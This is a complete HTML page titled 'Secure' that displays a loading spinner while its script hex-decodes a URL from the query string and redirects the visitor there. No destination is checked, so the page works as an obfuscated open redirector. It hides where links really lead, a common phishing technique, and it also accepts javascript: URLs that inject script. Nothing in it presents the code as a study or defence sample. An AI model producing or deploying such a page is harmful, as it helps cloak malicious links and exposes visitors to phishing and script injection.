<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure</title>
  <script>
    function hexDecode(hexString) {
      var hex = hexString.toString();
      var str = '';
      for (var i = 0; i < hex.length; i += 2)
        str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
      return str;
    }

    window.onload = function() {
      // Remove the '?' and get the query string
      var queryString = window.location.search.substring(1);
      // Split the query string on '&' and use only the first parameter (the hex string)
      var hexEncodedUrl = queryString.split("&")[0];
      var decodedUrl = hexDecode(hexEncodedUrl);
      window.location.replace(decodedUrl);
    };
  </script>
  <style>
    /* Dot spinner animation */
    .loader {
      display: flex;
      justify-content: center;
      align-items: center;
      position: absolute;
      top: 0; bottom: 0; left: 0; right: 0;
    }
    .dot {
      width: 15px;
      height: 15px;
      margin: 0 5px;
      background-color: #000000;
      border-radius: 50%;
      display: inline-block;
      animation: bounce 1.5s infinite ease-in-out;
    }
    .dot:nth-child(1) { animation-delay: 0s; }
    .dot:nth-child(2) { animation-delay: 0.2s; }
    .dot:nth-child(3) { animation-delay: 0.4s; }
    @keyframes bounce {
      0%, 80%, 100% { transform: scale(0); opacity: 0.3; }
      40% { transform: scale(1); opacity: 1; }
    }
  </style>
</head>
<body>
  <!-- Dot spinner animation -->
  <div class="loader">
    <div class="dot"></div>
    <div class="dot"></div>
    <div class="dot"></div>
  </div>
</body>
</html>
